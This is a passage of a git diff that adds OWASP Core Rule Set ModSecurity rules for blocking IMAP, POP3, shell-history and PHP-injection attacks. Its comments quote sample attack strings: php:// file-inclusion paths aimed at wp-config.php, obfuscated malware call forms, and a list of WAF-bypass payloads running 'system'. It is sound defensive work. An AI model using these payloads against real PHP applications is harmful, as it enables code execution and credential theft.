[\"-#%-&\*\--\.0-9A-Z\x5c_a-z]+|PUNGE)|FETCH [\*,0-:]+|L(?:IST [\"-#\*\--9A-Z\x5c_a-z~]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|OG(?:IN [\--\.0-9@_a-z]{1,40} .*?|OUT))|RENAME [\"-#%-&\*\--9A-Z\x5c_a-z]+? [\"-#%-&\*\--9A-Z\x5c_a-z]+|S(?:E(?:LECT [\"-#%-&\*\--9A-Z\x5c_a-z]+|ARCH(?: CHARSET [\--\.0-9A-Z_a-z]{1,40})? 
(?:(KEYWORD \x5c)?(?:A(?:LL|NSWERED)|BCC|D(?:ELETED|RAFT)|(?:FLAGGE|OL)D|RECENT|SEEN|UN(?:(?:ANSWER|FLAGG)ED|D(?:ELETED|RAFT)|SEEN)|NEW)|(?:BODY|CC|FROM|HEADER .{1,100}|NOT|OR .{1,255}|T(?:EXT|O)) .{1,255}|LARGER [0-9]{1,20}|[\*,0-:]+|(?:BEFORE|ON|S(?:ENT(?:(?:BEFOR|SINC)E|ON)|INCE)) \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4}\"?|S(?:MALLER [0-9]{1,20}|UBJECT .{1,255})|U(?:ID [\*,0-:]+?|NKEYWORD \x5c(Seen|(?:Answer|Flagg)ed|D(?:eleted|raft)|Recent))))|T(?:ORE [\*,0-:]+? [\+\-]?FLAGS(?:\.SILENT)? (?:\(\x5c[a-z]{1,20}\))?|ARTTLS)|UBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+)|UN(?:SUBSCRIBE [\"-#%-&\*\--9A-Z\x5c_a-z]+|AUTHENTICATE)|NOOP)" \ + "id:932311,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# These commands may have a higher risk of false positives. +# For explanation of this rule, see above rule 932320. +# +# Rule 932321 is a stricter sibling of rule 932320. +# +# Regular expression generated from regex-assembly/932321.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932321 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?:QUI|STA|RSE)(?i:T)|NOOP|CAPA)" \ + "id:932321,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# =[ Unix shell history invocation ]= +# +# This rule is a stricter sibling of 932330. +# Shell history can also be invoked by providing an absolute position: '!1' or by repeating the last command '!!'. +# The latter might seem harmless as you would expect that it already requires a successful exploitation, but it is a threat in disguise. +# +# Imagine the following requests: +# GET /?rce=c +# GET /?rce=!!!! +# The last request will invoke /usr/bin/cc, which is otherwise blocked by 932150. +# +# Neither !1 nor !! is necessarily valid speech, but blocking either of them is much more likely to cause false-positives than 932330. 
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !(?:\d|!)" \ + "id:932331,\ + phase:2,\ + block,\ + t:none,\ + msg:'Remote Command Execution: Unix shell history invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE" diff --git a/nginx/config/owasp-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/nginx/config/owasp-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf new file mode 100644 index 00000000..b438b6bc --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf 
@@ -0,0 +1,768 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ PHP Injection Attacks ]=- +# +# [ References ] +# https://rips-scanner.sourceforge.net/ +# https://wiki.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh +# + +# +# [ PHP Open Tag Found ] +# +# Detects PHP open tags "', but +# this resulted in false positives which were difficult to prevent. +# Therefore, that pattern is now checked by rule 933190 in paranoia levels +# 3 or higher. 
+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:/|\x5c)?php\])" \ + "id:933100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Open Tag Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# [ PHP Script Uploads ] +# +# Block file uploads with filenames ending in PHP related extensions +# (.php, .phps, .phtml, .php5 etc). +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload +# +# Attackers may use such a vulnerability to achieve remote code execution +# by uploading a .php file. If the upload storage location is predictable +# and not adequately protected, the attacker may then request the uploaded +# .php file and have the code within it executed on the server. +# +# Also block files with just dot (.) characters after the extension: +# https://www.rapid7.com/blog/post/2013/08/15/time-to-patch-joomla/ +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. 
+# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.ph(?:p\d*|tml|ar|ps|t|pt)\.*$" \ + "id:933110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Configuration Directives ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \ + "id:933120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,\ + msg:'PHP Injection Attack: Configuration Directive Found',\ + logdata:'Matched Data: %{TX.933120_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.933120_tx_0=%{tx.0}',\ + chain" + SecRule MATCHED_VARS "@pm =" \ + "capture,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Variables ] +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \ + "id:933130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP I/O Streams ] +# +# The "php://" syntax can be used to refer to various objects, such as local files (for LFI), +# remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt +# to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app. +# +# Examples: +# php://filter/resource=./../../../wp-config.php +# php://filter/resource=http://www.example.com +# php://stdin +# php://input +# +# http://php.net/manual/en/wrappers.php.php +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \ + "id:933140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: I/O Stream Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Wrappers ] +# +# PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem +# functions such as fopen(), copy(), file_exists() and filesize(). 
Abusing of PHP wrappers like phar:// +# could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +# wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE. +# +# Valid PHP wrappers can be found in the PHP documentation here: +# https://www.php.net/manual/en/wrappers.php +# +# Regular expression generated from regex-assembly/933200.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933200 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://" \ + "id:933200,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'PHP Injection Attack: Wrapper scheme detected',\ + logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions ] +# +# Detecting PHP function names is useful to block PHP code injection attacks. +# There are many PHP functions. We have to strike a balance between robust detection +# of PHP code in content, and the risk of false positives. +# +# The list of PHP functions is divided into four groups of varying attack/false positive risk. +# Four separate rules are used to detect these groups of functions: +# +# - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in +# natural language or other contexts. 
+# Examples: 'base64_decode', 'file_get_contents'. +# These words are detected as a match directly using @pmFromFile. +# Function names are defined in php-function-names-933150.data +# +# - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause +# false positives in natural language or other contexts. +# Examples: 'chr', 'eval'. +# To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'. +# Regexp is generated from function names in util/regexp-assemble/data/933160.data +# +# - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords. +# Examples: 'addslashes', 'array_diff'. +# For performance reasons, the @pmFromFile operator is used, and many functions from lesser +# used PHP extensions are removed. +# To mitigate false positives, we only match when the '(' character is also found. +# This rule only runs in paranoia level 2 or higher. +# Function names are defined in php-function-names-933151.data +# +# - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives. +# Examples: 'abs', 'cos'. +# To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'. +# This rule only runs in paranoia level 3 or higher. +# Regexp is generated from function names in util/regexp-assemble/data/933161.data +# + + +# +# [ PHP Functions: High-Risk PHP Function Names ] +# +# Rule 933150 contains a small list of function names which are highly indicative of a PHP +# injection attack, for example 'base64_decode'. +# We block these function names outright, without using a complex regexp or chain. +# This could make the detection a bit more robust against possible bypasses. 
+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \ + "id:933150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: High-Risk PHP Function Calls ] +# +# Some PHP function names have a certain risk of false positives, due to short +# names, full or partial overlap with common natural language terms, uses in +# other contexts, et cetera. Some examples are 'eval', 'exec', 'system'. +# +# For these function names, we apply a regexp to look for PHP function syntax. +# The regexp looks for a word boundary and adjoining parentheses. +# For instance, we want to block 'eval()', but we want to allow 'medieval()'. +# +# We have to be careful of possible bypasses using comment syntax. Examples: +# +# system(...) +# system (...) +# system\t(...) +# system /*comment*/ (...) +# system /*multiline \n comment*/ (...) +# system //comment \n (...) +# system #comment \n (...) +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regular expression generated from regex-assembly/933160.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933160 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|file(?:group)?|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|md5|o(?:pendir|rd)|p(?:assthru|open|rev)|(?:read|tmp)file|un(?:pac|lin)k|s(?:tat|ubstr|ystem))(?:/(?:\*.*\*/|/.*)|#.*|[\s\v\"])*[\"']*\)?[\s\v]*\(.*\)" \ + "id:933160,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Object Injection ] +# +# PHP Object Injection is an application level vulnerability that could allow +# an attacker to perform different kinds of malicious attacks, such as +# Code Injection, SQL Injection, Path Traversal and Application Denial of Service, +# depending on the context. +# +# The vulnerability occurs when user-supplied input is not properly sanitized +# before being passed to the unserialize() PHP function. Since PHP allows object +# serialization, attackers could pass ad-hoc serialized strings to a vulnerable +# unserialize() call, resulting in an arbitrary PHP object(s) injection into the +# application scope. 
+# +# https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection +# +# In serialized form, PHP objects have the following format: +# +# O:8:"stdClass":1:{s:1:"a";i:2;} +# O:3:"Foo":0:{} +# +# Also detected are PHP objects with a custom unserializer: +# https://www.phpinternalsbook.com/php5/classes_objects/serialization.html +# These have the following format: +# +# C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} +# C:3:"Foo":23:{s:15:"My private data";} +# +# HTTP headers are inspected, since PHP object injection vulnerabilities have been +# found in applications parsing them: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header) +# https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header) +# http://karmainsecurity.com/KIS-2015-10 (Host header) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \ + "id:933170,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Serialized Object Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +# +# [ PHP Functions: Variable Function Calls ] +# +# PHP 'variable functions' provide an alternate syntax for calling PHP functions. +# http://php.net/manual/en/functions.variable-functions.php +# +# An attacker may use variable function syntax to evade detection of function +# names during exploitation of a remote code execution vulnerability. 
+# An example to use the 'file_get_contents' function while evading rule 933150: +# +# $fn = 'file_' . 'get_' . 'contents'; +# echo $fn('wp-co' . 'nfig.php'); +# +# Some examples from obfuscated malware: +# +# $OOO0000O0(...) +# @$b374k(...) +# $_[@-_]($_[@!+_] ) +# +# A breakdown of the regular expression: +# +# \$+ +# The variable's '$' char, or multiple '$' for 'variable variables': +# http://php.net/manual/en/language.variables.variable.php +# (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+}) +# One of the following: +# - A variable name; regexp from http://php.net/language.variables.basics +# - A nonempty expression for variable variables: ${'fn'} or $ {'fn'} +# (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)* +# Optional whitespace, array access, or comments +# \(.*\) +# Parentheses optionally containing function parameters +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933180,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP Functions: Variable Function Prevent Bypass ] +# +# Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ +# Regex test on https://regex101.com/r/x1tfXG/1 +# the rule 933180 could be bypassed by using the following payloads: +# +# - (system)('uname'); +# - (sy.(st).em)('uname'); +# - (string)"system"('uname'); +# - 
define('x', 'sys' . 'tem');(x)/* comment */('uname'); +# - $y = 'sys'.'tem';($y)('uname'); +# - define('z', [['sys' .'tem']]);(z)[0][0]('uname'); +# - (system)(ls); +# - (/**/system)(ls/**/); +# - (['system'])[0]('uname'); +# - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++); +# +# This rule blocks all payloads above and avoids to block values like: +# +# - [ACME] this is a test (just a test) +# - Test (with two) rounded (brackets) +# +# Regular expression generated from regex-assembly/933210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\);" \ + "id:933210,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# 
+ +# +# [ PHP Functions: Medium-Risk PHP Function Names ] +# +# In paranoia level 2, we add additional checks for most PHP functions. +# +# The size of the PHP function list is considerable. +# Even after excluding the more obscure PHP extensions, 1300+ functions remain. +# For performance and maintenance reasons, this rule does not use a regexp, +# but uses a phrase file (@pmFromFile), and additionally looks for an '(' character +# in the matched variable. +# +# This approach carries some risk for false positives. Therefore, the function list +# has been curated to remove words closely matching natural language and terms often +# used in other contexts. +# +# This rule is a stricter sibling of rule 933150. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \ + "id:933151,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.933151_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.933151_tx_0=%{tx.0}',\ + chain" + SecRule MATCHED_VARS "@pm (" \ + "capture,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +# +# [ PHP Variables: Common Variable Indexes ] +# +# In 
paranoia level 3, we add additional checks for parameters to many PHP variables. +# +# +# One of the more common variables used within attacks on PHP is $_SERVER. Because +# of how many different ways PHP has for executing variables (variable variables, +# etc) often just looking for $_SERVER will be less effective than looking for the +# various indexes within $_SERVER. This rule checks for these indexes. +# This rule is located in PL 3 because often developers will use these names as +# parameter names or values and this will lead to false positives. +# Because this list is not expected to change and it is limited in size we use a +# regex in this case to look for these values whereas in its sibling rule we use +# @pmFromFile for flexibility and performance. +# +# Regular expression generated from regex-assembly/933131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933131 +# +# This rule is a stricter sibling of rule 933130. 
